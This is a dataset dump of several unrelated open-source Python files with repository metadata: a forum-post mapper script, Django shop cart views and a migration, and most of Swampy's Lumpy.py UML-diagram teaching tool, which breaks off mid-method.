d083061ae7ec607f5b7bdf46d170d90a46ec22a3
|
ca126ff05c78c42b699fd0b6cf7c3c0fc4c03313
|
refs/heads/master
| 2021-05-01T07:15:01.456532
| 2018-03-18T01:47:43
| 2018-03-18T01:47:43
| 121,152,389
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/python
import sys
import csv
reader = csv.reader(sys.stdin, delimiter='\t')
reader.next()
for data in reader:
if len(data) == 19:
id, title, tagnames, author_id, body, node_type, parent_id, abs_parent_id, added_at, score, state_string,\
last_edited_id, last_activity_by_id, last_activity_at, active_revision_id, \
extra, extra_ref_id, extra_count, marked = data
if node_type == "answer":
identifier = abs_parent_id
elif node_type == "question":
identifier == id
print "{0}\t{1}\t{2}".format(identifier, node_type, len(body))
|
[
"rzskhr@outlook.com"
] |
rzskhr@outlook.com
|
00f8c9438b9ec2ded08e135db341637e568f1e40
|
d6934bd6680e704aac70660b5abb047b82b81cd3
|
/cart/views.py
|
97c18ab5d2708a547b3b8ef61fafe4fa28feffe9
|
[] |
no_license
|
mockystr/django_shop
|
b20239c753b67980b05d7311e5b28cb50b433250
|
85c805860c380c21ea6e9b30950dac09ec5d45d3
|
refs/heads/master
| 2020-03-27T21:11:14.083013
| 2018-09-11T16:08:59
| 2018-09-11T16:08:59
| 147,122,372
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,576
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.http import require_POST
from shop.models import Product
from .cart import Cart
from .forms import CartAddProductForm
from coupons.forms import CouponApplyForm
from shop.recommender import Recommender
@require_POST
def cart_add(request, product_id):
cart = Cart(request)
product = get_object_or_404(Product, id=product_id)
form = CartAddProductForm(request.POST)
if form.is_valid():
cd = form.cleaned_data
cart.add(product=product, quantity=cd['quantity'], update_quantity=cd['update'])
return redirect('cart:cart_detail')
def cart_remove(request, product_id):
cart = Cart(request)
product = get_object_or_404(Product, id=product_id)
cart.remove(product)
return redirect('cart:cart_detail')
def cart_detail(request):
cart = Cart(request)
for item in cart:
item['update_quantity_form'] = CartAddProductForm(initial={'quantity': item['quantity'], 'update': True})
coupon_apply_form = CouponApplyForm()
# r = Recommender()
# cart_products = [item['product'] for item in cart]
# recommended_products = r.suggest_products_for(cart_products, max_results=4)
return render(request, 'cart/detail.html', {'cart': cart,
'coupon_apply_form': coupon_apply_form,
# 'recommended_products': recommended_products
})
|
[
"navruzov.e@mail.ru"
] |
navruzov.e@mail.ru
|
0c1e6d12cfdc587b71555a705a5987682eeec445
|
c059eb73ca9687bcfb469e6de5b1cd45574ab5c4
|
/django/mysite/pybo/migrations/0003_answer_author.py
|
9902c64bc56ffa2874e5e45b7488d0e0e533bee7
|
[] |
no_license
|
DongwookKim0823/Jump_To_Django
|
01a5367b94874130bb44eebbc5917d32663c3a2b
|
99b2e50cb2ce50fc02e5eea7297eba9b67683fa6
|
refs/heads/main
| 2023-07-03T00:28:03.528556
| 2021-08-05T14:59:04
| 2021-08-05T14:59:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
# Generated by Django 3.2.4 on 2021-07-13 08:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pybo', '0002_question_author'),
]
operations = [
migrations.AddField(
model_name='answer',
name='author',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='auth.user'),
preserve_default=False,
),
]
|
[
"dwkim0823@naver.com"
] |
dwkim0823@naver.com
|
499b84e469bde9702e0fa190e50d9de456e494ed
|
fc52aef588754c41db17a1d28252b1899c2a8cba
|
/swampy/Lumpy.py
|
9eaf153cdd7a2b087e758150c0f4213d5d1b9776
|
[] |
no_license
|
hypan599/think_complexity
|
884e5fcaeeaf66450da6ce28439bfe2b49a14439
|
26b4542c7362e8aa8731a6794228595c01605697
|
refs/heads/master
| 2021-09-08T10:55:26.755023
| 2018-03-09T10:39:57
| 2018-03-09T10:39:57
| 112,902,374
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 48,358
|
py
|
#!/usr/bin/python
"""This module is part of Swampy, a suite of programs available from
allendowney.com/swampy.
Copyright 2010 Allen B. Downey
Distributed under the GNU General Public License at gnu.org/licenses/gpl.html.
UML diagrams for Python
Lumpy generates UML diagrams (currently object and class diagrams)
from a running Python program. It is similar to a graphical debugger
in the sense that it generates a visualization of the state of a
running program, but it is different from a debugger in the sense that
it tries to generate high-level visualizations that are compliant (at
least in spirit) with standard UML.
There are three target audiences for this module: teachers, students
and software engineers. Teachers can use Lumpy to generate figures
that demonstrate a model of the execution of a Python
program. Students can use Lumpy to explore the behavior of the Python
interpreter. Software engineers can use Lumpy to extract the structure
of existing programs by diagramming the relationships among the
classes, including classes defined in libraries and the Python
interpreter.
"""
import inspect
import sys
import tkinter
from tkinter import N, S, E, W, SW, HORIZONTAL, ALL, LAST
from Gui import Gui, GuiCanvas, Point, BBox, underride, ScaleTransform
# get the version of Python
VERSION = sys.version.split()[0].split('.')
MAJOR = int(VERSION[0])
if MAJOR < 2:
print('You must have at least Python version 2.0 to run Lumpy.')
sys.exit()
MINOR = int(VERSION[1])
if MAJOR == 2 and MINOR < 4:
# author_TODO: provide a substitute implementation of set
pass
if MAJOR == 2:
TKINTER_MODULE = Tkinter
else:
TKINTER_MODULE = tkinter
# most text uses the font specified below; some labels
# in object diagrams use smallfont. Lumpy uses the size
# of the fonts to define a length unit, so
# changing the font sizes will cause the whole diagram to
# scale up or down.
FONT = ("Helvetica", 10)
SMALLFONT = ("Helvetica", 9)
class DiagCanvas(GuiCanvas):
"""Canvas for displaying Diagrams."""
def box(self, box, padx=0.4, pady=0.2, **options):
"""Draws a rectangle with the given bounding box.
Args:
box: BBox object or list of coordinate pairs.
padx, pady: padding
"""
# underride sets default values only if the called hasn't
underride(options, outline='black')
box.left -= padx
box.top -= pady
box.right += padx
box.bottom += pady
item = self.rectangle(box, **options)
return item
def arrow(self, start, end, **options):
"""Draws an arrow.
Args:
start: Point or coordinate pair.
end: Point or coordinate pair.
"""
return self.line([start, end], **options)
def offset_text(self, pos, text, dx=0, dy=0, **options):
"""Draws the given text at the given position.
Args:
pos: Point or coordinate pair
text: string
dx, dy: offset
"""
underride(options, fill='black', font=FONT, anchor=W)
x, y = pos
x += dx
y += dy
return self.text([x, y], text, **options)
def dot(self, pos, r=0.2, **options):
"""Draws a dot at the given position with radius r."""
underride(options, fill='white', outline='orange')
return self.circle(pos, r, **options)
def measure(self, t, **options):
"""Finds the bounding box of the list of words.
Draws the text, measures them, and then deletes them.
"""
pos = Point([0, 0])
tags = 'temp'
for s in t:
self.offset_text(pos, s, tags=tags, **options)
pos.y += 1
bbox = self.bbox(tags)
self.delete(tags)
return bbox
class MakeTag(object):
"""Encapsulates a unique Tag generator."""
nextid = 0
@classmethod
def make_tag(cls, prefix='Tag'):
"""Return a tuple with a single element: a tag string.
Uses the given prefix and a unique id as a suffix.
prefix: string
returns: string
"""
cls.nextid += 1
tag = '%s%d' % (prefix, cls.nextid)
return tag,
class Thing(object):
"""Parent class for objects that have a graphical representation.
Each Thing object corresponds to an item
or set of items in a diagram. A Thing can only be drawn in
one Diagram at a time.
"""
things_created = 0
things_drawn = 0
def __new__(cls, *args, **kwds):
"""Override __new__ so we can count the number of Things."""
Thing.things_created += 1
return object.__new__(cls)
def get_bbox(self):
"""Returns the bounding box of this object if it is drawn."""
return self.canvas.bbox(self.tags)
def set_offset(self, pos):
"""Sets the offset attribute.
The offset attribute keeps track of the offset between
the bounding box of the Thing and its nominal position, so
that if the Thing is moved later, we can compute its new
nominal position.
"""
self.offset = self.get_bbox().offset(pos)
def pos(self):
"""Computes the nominal position of a Thing.
Gets the current bounding box and adds the offset.
"""
return self.get_bbox().pos(self.offset)
def isdrawn(self):
"""Return True if the object has been drawn."""
return hasattr(self, 'drawn')
def draw(self, diag, pos, flip, tags=tuple()):
"""Draws this Thing at the given position.
Most child classes use this method as a template and
override drawme() to provide type-specific behavior.
draw() and drawme() are not allowed to modify pos.
Args:
diag: which diagram to draw on
pos: Point or coordinate pair
flip: int (1 means draw left to right; flip=-1 means right to left)
tags: additional tags to apply
Returns:
list of Thing objects
"""
if self.isdrawn():
return []
self.drawn = True
self.diag = diag
self.canvas = diag.canvas
# keep track of how many things have been drawn.
# Simple values can get drawn more than once, so the
# total number of things drawn can be greater than
# the number of things.
Thing.things_drawn += 1
if Thing.things_drawn % 100 == 0:
print(Thing.things_drawn)
# uncomment this to see things as they are drawn
#self.diag.lumpy.update()
# each thing has a list of tags: its own tag plus
# the tag of each thing it belongs to. This convention
# makes it possible to move entire structures with one
# move command.
self.tags = MakeTag.make_tag(self.__class__.__name__)
tags += self.tags
# invoke drawme in the child class
drawn = self.drawme(diag, pos, flip, tags)
if drawn == None:
drawn = [self]
self.set_offset(pos)
return drawn
def drawme(self, diag, pos, flip, tags):
raise ValueError('Unimplemented method.')
def bind(self, tags=None):
"""Create bindings for the items with the given tags."""
tags = tags or self.tags
items = self.canvas.find_withtag(tags)
for item in items:
self.canvas.tag_bind(item, "<Button-1>", self.down)
def down(self, event):
"""Save state for the beginning of a drag and drop.
Callback invoked when the user clicks on an item.
"""
self.dragx = event.x
self.dragy = event.y
self.canvas.bind("<B1-Motion>", self.motion)
self.canvas.bind("<ButtonRelease-1>", self.up)
return True
def motion(self, event):
"""Move the Thing during a drag.
Callback invoked when the user drags an item"""
dx = event.x - self.dragx
dy = event.y - self.dragy
self.dragx = event.x
self.dragy = event.y
self.canvas.move(self.tags, dx, dy)
self.diag.update_arrows()
def up(self, event):
"""Release the object being dragged.
Callback invoked when the user releases the button.
"""
event.widget.unbind ("<B1-Motion>")
event.widget.unbind ("<ButtonRelease-1>")
self.diag.update_arrows()
class Dot(Thing):
"""Represents a dot in a diagram."""
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
self.canvas.dot(pos, tags=tags)
class Simple(Thing):
"""Represents a simple value like a number or a string."""
def __init__(self, lumpy, val):
lumpy.register(self, val)
self.val = val
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
p.x += 0.1 * flip
anchor = {1:W, -1:E}
# put quotes around strings; for everything else, use
# the standard str representation
val = self.val
maxlen = 30
if isinstance(val, str):
val = val.strip('\n')
label = "'%s'" % val[0:maxlen]
else:
label = str(val)
self.canvas.offset_text(p, label, tags=tags, anchor=anchor[flip])
self.bind()
class Index(Simple):
"""Represents an index in a Sequence.
An Index object does not register with lumpy, so that even
in pedantic mode, it is always drawn, and it is never the
target of a reference (since it is not really a value at
run-time).
"""
def __init__(self, _, val):
self.val = val
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
p.x += 0.1 * flip
anchor = {1:W, -1:E}
label = str(self.val)
self.canvas.offset_text(p, label, tags=tags, anchor=anchor[flip])
self.bind()
class Mapping(Thing):
"""Represents a mapping type (usually a dictionary).
Sequence and Instance inherit from Mapping.
"""
def __init__(self, lumpy, val):
lumpy.register(self, val)
self.bindings = make_kvps(lumpy, list(val.items()))
self.boxoptions = dict(outline='purple')
self.label = type(val).__name__
def get_bbox(self):
"""Gets the bounding box for this Mapping.
The bbox of a Mapping is the bbox of its box item.
This is different from other Things.
"""
return self.canvas.bbox(self.boxitem)
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
# intag is attached to items that should be considered
# inside the box
intag = self.tags[0] + 'inside'
# draw the bindings
for binding in self.bindings:
# check whether the key was already drawn
drawn = binding.key.isdrawn()
# draw the binding
binding.draw(diag, p, flip, tags=tags)
# apply intag to the dots
self.canvas.addtag_withtag(intag, binding.dot.tags)
if drawn:
# if the key was already drawn, then the binding
# contains two dots, so we should add intag to the
# second one.
if binding.dot2:
self.canvas.addtag_withtag(intag, binding.dot2.tags)
else:
# if the key wasn't drawn yet, it should be
# considered inside this mapping
self.canvas.addtag_withtag(intag, binding.key.tags)
# move down to the position for the next binding
p.y = binding.get_bbox().bottom + 1.8
if len(self.bindings):
# if there are any bindings, draw a box around them
bbox = self.canvas.bbox(intag)
item = self.canvas.box(bbox, tags=tags, **self.boxoptions)
else:
# otherwise just draw a box
bbox = BBox([p.copy(), p.copy()])
item = self.canvas.box(bbox, padx=0.4, pady=0.4, tags=tags,
**self.boxoptions)
# make the box clickable
self.bind(item)
self.boxitem = item
# put the label above the box
if self.label:
p = bbox.upperleft()
item = self.canvas.offset_text(p, self.label, anchor=SW,
font=SMALLFONT, tags=tags)
# make the label clickable
self.bind(item)
# if the whole mapping is not in the right position, shift it.
if flip == 1:
dx = pos.x - self.get_bbox().left
else:
dx = pos.x - self.get_bbox().right
self.canvas.move(self.tags, dx, 0, transform=True)
def scan_bindings(self, cls):
"""Looks for references to other types.
Invokes add_hasa on cls.
Args:
cls: is the Class of the object that contains this mapping.
"""
for binding in self.bindings:
for val in binding.vals:
self.scan_val(cls, val)
def scan_val(self, cls, val):
"""Looks for references to other types.
If we find a reference to an object type, make a note
of the HAS-A relationship. If we find a reference to a
container type, scan it for references.
Args:
cls: is the Class of the object that contains this mapping.
"""
if isinstance(val, Instance) and val.cls is not None:
cls.add_hasa(val.cls)
elif isinstance(val, Sequence):
val.scan_bindings(cls)
elif isinstance(val, Mapping):
val.scan_bindings(cls)
class Sequence(Mapping):
"""Represents a sequence type (mostly lists and tuples)."""
def __init__(self, lumpy, val):
lumpy.register(self, val)
self.bindings = make_bindings(lumpy, enumerate(val))
self.label = type(val).__name__
# color code lists, tuples, and other sequences
if isinstance(val, list):
self.boxoptions = dict(outline='green1')
elif isinstance(val, tuple):
self.boxoptions = dict(outline='green4')
else:
self.boxoptions = dict(outline='green2')
class Instance(Mapping):
"""Represents an object (usually).
Anything with a __dict__ is treated as an Instance.
"""
def __init__(self, lumpy, val):
lumpy.register(self, val)
# if this object has a class, make a Thing to
# represent the class, too
if hasclass(val):
class_or_type = val.__class__
self.cls = make_thing(lumpy, class_or_type)
else:
class_or_type = type(val)
self.cls = None
self.label = class_or_type.__name__
if class_or_type in lumpy.instance_vars:
# if the class is in the list, only display only the
# unrestricted instance variables
ks = lumpy.instance_vars[class_or_type]
it = [(k, getattr(val, k)) for k in ks]
seq = make_bindings(lumpy, it)
else:
# otherwise, display all of the instance variables
if hasdict(val):
it = list(val.__dict__.items())
elif hasslots(val):
it = [(k, getattr(val, k)) for k in val.__slots__]
else:
t = [k for k, v in type(val).__dict__.items()
if str(v).find('attribute') == 1]
it = [(k, getattr(val, k)) for k in t]
seq = make_bindings(lumpy, it)
# and if the object extends list, tuple or dict,
# append the items
if isinstance(val, (list, tuple)):
seq += make_bindings(lumpy, enumerate(val))
if isinstance(val, dict):
seq += make_bindings(lumpy, list(val.items()))
# if this instance has a name attribute, show it
attr = '__name__'
if hasname(val):
seq += make_bindings(lumpy, [[attr, val.__name__]])
self.bindings = seq
self.boxoptions = dict(outline='red')
def scan_bindings(self, cls):
"""Look for references to other types.
Invokes add_ivar and add_hasa on cls.
Records the names of the instance variables.
Args:
cls: is the Class of the object that contains this mapping.
"""
for binding in self.bindings:
cls.add_ivar(binding.key.val)
for val in binding.vals:
self.scan_val(cls, val)
class Frame(Mapping):
"""Represents a frame."""
def __init__(self, lumpy, frame):
it = list(frame.locals.items())
self.bindings = make_bindings(lumpy, it)
self.label = frame.func
self.boxoptions = dict(outline='blue')
class Class(Instance):
"""Represents a Class.
Inherits from Instance, which controls how a Class appears in an
object diagram, and contains a ClassDiagramClass, which
controls how the Class appears in a class diagram.
"""
def __init__(self, lumpy, classobj):
Instance.__init__(self, lumpy, classobj)
self.cdc = ClassDiagramClass(lumpy, classobj)
self.cdc.cls = self
lumpy.classes.append(self)
self.classobj = classobj
self.module = classobj.__module__
self.bases = classobj.__bases__
# childs is the list of classes that inherit directly
# from this one; parents is the list of base classes
# for this one
self.childs = []
# refers is a dictionary that records, for each other
# class, the total number of references we have found from
# this class to that
self.refers = {}
# make a list of Things to represent the
# parent classes
if lumpy.is_opaque(classobj):
self.parents = []
else:
self.parents = [make_thing(lumpy, base) for base in self.bases]
# add self to the parents' lists of children
for parent in self.parents:
parent.add_child(self)
# height and depth are used to lay out the tree
self.height = None
self.depth = None
def add_child(self, child):
"""Adds a child.
When a subclass is created, it notifies its parent
classes, who update their list of children."""
self.childs.append(child)
def add_hasa(self, child, n=1):
"""Increment the reference count from this class to a child."""
self.refers[child] = self.refers.get(child, 0) + n
def add_ivar(self, var):
"""Adds to the set of instance variables for this class."""
self.cdc.ivars.add(var)
def set_height(self):
"""Computes the maximum height between this class and a leaf class.
(A leaf class has no children)
Sets the height attribute.
"""
if self.height != None:
return
if not self.childs:
self.height = 0
return
for child in self.childs:
child.set_height()
heights = [child.height for child in self.childs]
self.height = max(heights) + 1
def set_depth(self):
"""Compute the maximum depth between this class and a root class.
(A root class has no parent)
Sets the depth attribute.
"""
if self.depth != None:
return
if not self.parents:
self.depth = 0
return
for parent in self.parents:
parent.set_depth()
depths = [parent.depth for parent in self.parents]
self.depth = max(depths) + 1
class ClassDiagramClass(Thing):
"""Represents a class as it appears in a class diagram."""
def __init__(self, lumpy, classobj):
self.lumpy = lumpy
self.classobj = classobj
# self.methods is the list of methods defined in this class.
# self.cvars is the list of class variables.
# self.ivars is a set of instance variables.
self.methods = []
self.cvars = []
self.ivars = set()
# if this is a restricted (or opaque) class, then
# vars contains the list of instance variables that
# will be shown; otherwise it is None.
try:
variables = lumpy.instance_vars[classobj]
except KeyError:
variables = None
# we can get methods and class variables now, but we
# have to wait until the Lumpy representation of the stack
# is complete before we can go looking for instance vars.
for key, val in list(classobj.__dict__.items()):
if variables is not None and key not in variables:
continue
if iscallable(val):
self.methods.append(val)
else:
self.cvars.append(key)
key = lambda x: x.__class__.__name__ + "." + x.__name__
self.methods.sort(key=key)
self.cvars.sort()
self.boxoptions = dict(outline='blue')
self.lineoptions = dict(fill='blue')
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
# draw the name of the class
name = self.classobj.__name__
item = self.canvas.offset_text(p, name, tags=tags)
p.y += 0.8
# in order to draw lines between segments, we have
# to store the locations and draw the lines, later,
# when we know the location of the box
lines = []
# draw a line between the name and the methods
if self.methods:
lines.append(p.y)
p.y += 1
# draw the methods
for f in self.methods:
item = self.canvas.offset_text(p, f.__name__, tags=tags)
p.y += 1
# draw the class variables
cvars = [var for var in self.cvars if not var.startswith('__')]
if cvars:
lines.append(p.y)
p.y += 1
for varname in cvars:
item = self.canvas.offset_text(p, varname, tags=tags)
p.y += 1
# if this is a restricted (or opaque) class, remove
# unwanted instance vars from self.ivars
try:
variables = self.lumpy.instance_vars[self.classobj]
self.ivars.intersection_update(variables)
except KeyError:
pass
# draw the instance variables
ivars = list(self.ivars)
ivars.sort()
if ivars:
lines.append(p.y)
p.y += 1
for varname in ivars:
item = self.canvas.offset_text(p, varname, tags=tags)
p.y += 1
# draw the box
bbox = self.get_bbox()
item = self.canvas.box(bbox, tags=tags, **self.boxoptions)
self.boxitem = item
# draw the lines
for y in lines:
coords = [[bbox.left, y], [bbox.right, y]]
item = self.canvas.line(coords, tags=tags, **self.lineoptions)
# only the things we have drawn so far should be bound
self.bind()
# make a list of all classes drawn
alldrawn = [self]
# draw the descendents of this class
childs = self.cls.childs
if childs:
q = pos.copy()
q.x = bbox.right + 8
drawn = self.diag.draw_classes(childs, q, tags)
alldrawn.extend(drawn)
self.head = self.arrow_head(diag, bbox, tags)
# connect this class to its children
for child in childs:
a = ParentArrow(self.lumpy, self, child.cdc)
self.diag.add_arrow(a)
# if the class is not in the right position, shift it.
dx = pos.x - self.get_bbox().left
self.canvas.move(self.tags, dx, 0)
return alldrawn
def arrow_head(self, diag, bbox, tags, size=0.5):
"""Draws the hollow arrow head.
Connects this class to classes that inherit from it.
"""
x, y = bbox.midright()
x += 0.1
coords = [[x, y], [x+size, y+size], [x+size, y-size], [x, y]]
item = self.canvas.line(coords, tags=tags, **self.lineoptions)
return item
class Binding(Thing):
"""Represents the binding between a key or variable and a value."""
def __init__(self, lumpy, key, val):
lumpy.register(self, (key, val))
self.key = key
self.vals = [val]
def rebind(self, val):
"""Add to the list of values.
I don't remember what this is for and it is not in current use.
"""
self.vals.append(val)
def draw_key(self, diag, pos, flip, tags):
"""Draws a reference to a previously-drawn key.
(Rather than drawing the key inside the mapping.)
"""
pos.x -= 0.5 * flip
self.dot2 = Dot()
self.dot2.draw(diag, pos, -flip, tags=tags)
# only the things we have drawn so far should
# be handles for this binding
self.bind()
if not self.key.isdrawn():
pos.x -= 2.0 * flip
self.key.draw(diag, pos, -flip, tags=tags)
a = ReferenceArrow(self.lumpy, self.dot2, self.key, fill='orange')
diag.add_arrow(a)
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
self.dot = Dot()
self.dot.draw(diag, pos, flip, tags=tags)
p = pos.copy()
p.x -= 0.5 * flip
# if the key is a Simple, try to draw it inside the mapping;
# otherwise, draw a reference to it
if isinstance(self.key, Simple):
drawn = self.key.draw(diag, p, -flip, tags=tags)
# if a Simple thing doesn't get drawn, we must be in
# pedantic mode.
if drawn:
self.bind()
self.dot2 = None
else:
self.draw_key(diag, p, flip, tags)
else:
self.draw_key(diag, p, flip, tags)
p = pos.copy()
p.x += 2.0 * flip
for val in self.vals:
val.draw(diag, p, flip, tags=tags)
a = ReferenceArrow(self.lumpy, self.dot, val, fill='orange')
diag.add_arrow(a)
p.y += 1
class Arrow(Thing):
"""Parent class for arrows."""
def update(self):
"""Redraws this arrow after something moves."""
if not hasdiag(self):
return
self.diag.canvas.delete(self.item)
self.draw(self.diag)
class ReferenceArrow(Arrow):
"""Represents a reference in an object diagram."""
def __init__(self, lumpy, key, val, **options):
self.lumpy = lumpy
self.key = key
self.val = val
self.options = options
def draw(self, diag):
"""Draw the Thing.
Overrides draw() rather than drawme() because arrows can't
be dragged and dropped.
"""
self.diag = diag
canvas = diag.canvas
self.item = canvas.arrow(self.key.pos(),
self.val.pos(),
**self.options)
self.item.lower()
def update(self):
"""Redraws this arrow after something moves."""
if not hasdiag(self):
return
self.item.coords([self.key.pos(), self.val.pos()])
class ParentArrow(Arrow):
"""Represents an inheritance arrow.
Shows an is-a relationship between classes in a class diagram.
"""
def __init__(self, lumpy, parent, child, **options):
self.lumpy = lumpy
self.parent = parent
self.child = child
underride(options, fill='blue')
self.options = options
def draw(self, diag):
"""Draw the Thing.
Overrides draw() rather than drawme() because arrows can't
be dragged and dropped.
"""
self.diag = diag
parent, child = self.parent, self.child
# the line connects the midleft point of the child
# to the arrowhead of the parent; it always contains
# two horizontal segments and one vertical.
canvas = diag.canvas
bbox = canvas.bbox(parent.head)
p = bbox.midright()
q = canvas.bbox(child.boxitem).midleft()
midx = (p.x + q.x) / 2.0
m1 = [midx, p.y]
m2 = [midx, q.y]
coords = [p, m1, m2, q]
self.item = canvas.line(coords, **self.options)
canvas.lower(self.item)
class ContainsArrow(Arrow):
"""Represents a contains arrow.
Shows a has-a relationship between classes in a class diagram.
"""
def __init__(self, lumpy, parent, child, **options):
self.lumpy = lumpy
self.parent = parent
self.child = child
underride(options, fill='orange', arrow=LAST)
self.options = options
def draw(self, diag):
"""Draw the Thing.
Overrides draw() rather than drawme() because arrows can't
be dragged and dropped.
"""
self.diag = diag
parent, child = self.parent, self.child
if not child.isdrawn():
self.item = None
return
canvas = diag.canvas
p = canvas.bbox(parent.boxitem).midleft()
q = canvas.bbox(child.boxitem).midright()
coords = [p, q]
self.item = canvas.line(coords, **self.options)
canvas.lower(self.item)
class Stack(Thing):
"""Represents the call stack."""
def __init__(self, lumpy, snapshot):
self.lumpy = lumpy
self.frames = [Frame(lumpy, frame) for frame in snapshot.frames]
def drawme(self, diag, pos, flip, tags=tuple()):
"""Draws the Thing."""
p = pos.copy()
for frame in self.frames:
frame.draw(diag, p, flip, tags=tags)
bbox = self.get_bbox()
#p.y = bbox.bottom + 3
p.x = bbox.right + 3
def make_bindings(lumpy, iterator):
"""Make bindings for each key-value pair in iterator.
The keys are made into Index objects.
"""
seq = [Binding(lumpy, Index(lumpy, k), make_thing(lumpy, v))
for k, v in iterator]
return seq
def make_kvps(lumpy, iterator):
"""Make bindings for each key-value pair in iterator.
The keys are made into Thing objects.
"""
seq = [Binding(lumpy, make_thing(lumpy, k), make_thing(lumpy, v))
for k, v in iterator]
return seq
def make_thing(lumpy, val):
"""Make a Thing to represents this value.
Either by making a new one or looking up an existing one.
"""
# if we're being pedantic, then we always show aliased
# values
if lumpy.pedantic:
thing = lumpy.lookup(val)
if thing != None:
return thing
# otherwise for simple immutable types, ignore aliasing and
# just draw
simple = (str, bool, int, int, float, complex, type(None))
if isinstance(val, simple):
thing = Simple(lumpy, val)
return thing
# now check for aliasing even if we're not pedantic
thing = lumpy.lookup(val)
if thing != None:
return thing
# check the type of the value and dispatch accordingly
if type(val) == type(Lumpy) or type(val) == type(type(int)):
thing = Class(lumpy, val)
elif hasdict(val) or hasslots(val):
thing = Instance(lumpy, val)
elif isinstance(val, (list, tuple)):
thing = Sequence(lumpy, val)
elif isinstance(val, dict):
thing = Mapping(lumpy, val)
elif isinstance(val, object):
thing = Instance(lumpy, val)
else:
# print "Couldn't classify", val, type(val)
thing = Simple(lumpy, val)
return thing
# the following are short functions that check for certain attributes
def hasname(obj): return hasattr(obj, '__name__')
def hasclass(obj): return hasattr(obj, '__class__')
def hasdict(obj): return hasattr(obj, '__dict__')
def hasslots(obj): return hasattr(obj, '__slots__')
def hasdiag(obj): return hasattr(obj, 'diag')
def iscallable(obj): return hasattr(obj, '__call__')
class Snapframe(object):
"""A snapshot of a call frame."""
def __init__(self, tup):
frame, filename, lineno, self.func, lines, index = tup
(self.arg_names,
self.args,
self.kwds,
locs) = inspect.getargvalues(frame)
# make a copy of the dictionary of local vars
self.locals = dict(locs)
# the function name for the top-most frame is __main__
if self.func == '?':
self.func = '__main__'
def subtract(self, other):
"""Deletes the keys in other from self."""
for key in other.locals:
try:
del self.locals[key]
except KeyError:
print(key, "this shouldn't happen")
class Snapshot(object):
"""A snapshot of the call stack."""
def __init__(self):
"""Converts from the format returned by inspect to a list of frames.
Drop the last three frames,
which are the Lumpy functions object_diagram, make_stack,
and Stack.__init__
"""
st = inspect.stack()
frames = [Snapframe(tup) for tup in st[3:]]
frames.reverse()
self.frames = frames
def spew(self):
"""Prints the frames in this snapshot."""
for frame in self.frames:
print(frame.func, frame)
def clean(self, ref):
"""Remove all the variables in the reference stack from self.
NOTE: This currently only works on the top-most frame
"""
f1 = self.frames[0]
f2 = ref.frames[0]
f1.subtract(f2)
class Lumpy(Gui):
"""Container for the program state and its representations."""
def __init__(self, debug=False, pedantic=False):
"""Initializes Lumpy.
Args:
debug: boolean that makes the outlines of the frames visible.
pedantic: boolean whether to show aliasing for simple values.
If pedantic is false, simple values are replicated, rather
than, for example, having all references to 1 refer to the
same int object.
"""
Gui.__init__(self, debug)
self.pedantic = pedantic
self.withdraw()
# initially there is no object diagram, no class diagram
# and no representation of the stack.
self.od = None
self.cd = None
self.stack = None
# instance_vars maps from classes to the instance vars
# that are drawn for that class; for opaque classes, it
# is an empty list.
# an instance of an opaque class is shown with a small empty box;
# the contents are not shown.
self.instance_vars = {}
# the following classes are opaque by default
self.opaque_class(Lumpy)
self.opaque_class(object)
self.opaque_class(type(make_thing)) # function
self.opaque_class(Exception)
self.opaque_class(set) # I don't remember why
# any object that belongs to a class in the Tkinter module
# is opaque (the name of the module depends on the Python version)
self.opaque_module(TKINTER_MODULE)
# by default, class objects and module objects are opaque
classobjtype = type(Lumpy)
self.opaque_class(classobjtype)
modtype = type(inspect)
self.opaque_class(modtype)
# the __class__ of a new-style object is a type object.
# when type objects are drawn, show only the __name__
self.opaque_class(type)
self.make_reference()
def restrict_class(self, classobj, variables=None):
"""Restricts a class so that only the given variables are shown."""
if variables == None:
variables = []
self.instance_vars[classobj] = variables
def opaque_class(self, classobj):
"""Restricts a class so that no variables are shown."""
self.restrict_class(classobj, None)
def is_opaque(self, classobj):
"""Checks whether this class is completely opaque.
(restricted to _no_ instance variables)
"""
try:
return not len(self.instance_vars[classobj])
except KeyError:
return False
def transparent_class(self, classobj):
"""Unrestricts a class so its variables are shown.
If the class is not restricted, raise an exception."""
del self.instance_vars[classobj]
def opaque_module(self, modobj):
"""Makes all classes defined in this module opaque."""
for var, val in modobj.__dict__.items():
if isinstance(val, type(Lumpy)):
self.opaque_class(val)
def make_reference(self):
"""Takes a snapshot of the current state.
Subsequent diagrams will be relative to this reference.
"""
self._make_reference_helper()
def _make_reference_helper(self):
"""Takes the reference snapshot.
This extra method call is here so that the reference
and the snapshot we take later have the same number of
frames on the stack. UGH.
"""
self.ref = Snapshot()
def make_stack(self):
"""Takes a snapshot of the current state.
Subtract away the frames and variables that existed in the
previous reference, then makes a Stack.
"""
self.snapshot = Snapshot()
self.snapshot.clean(self.ref)
self.values = {}
self.classes = []
self.stack = Stack(self, self.snapshot)
def register(self, thing, val):
"""Associates a value with the Thing that represents it.
Later we can check whether we have already created
a Thing for a given value.
"""
thing.lumpy = self
thing.val = val
self.values[id(val)] = thing
def lookup(self, val):
"""Check whether a value is already represented by a Thing.
Returns:
an existing Thing or None.
"""
vid = id(val)
return self.values.get(vid, None)
def object_diagram(self, obj=None, loop=True):
"""Creates a new object diagram based on the current state.
If an object is provided, draws the object. Otherwise, draws
the current run-time stack (relative to the last reference).
"""
if obj:
thing = make_thing(self, obj)
else:
if self.stack == None:
self.make_stack()
thing = self.stack
# if there is already an Object Diagram, clear it; otherwise,
# create one
if self.od:
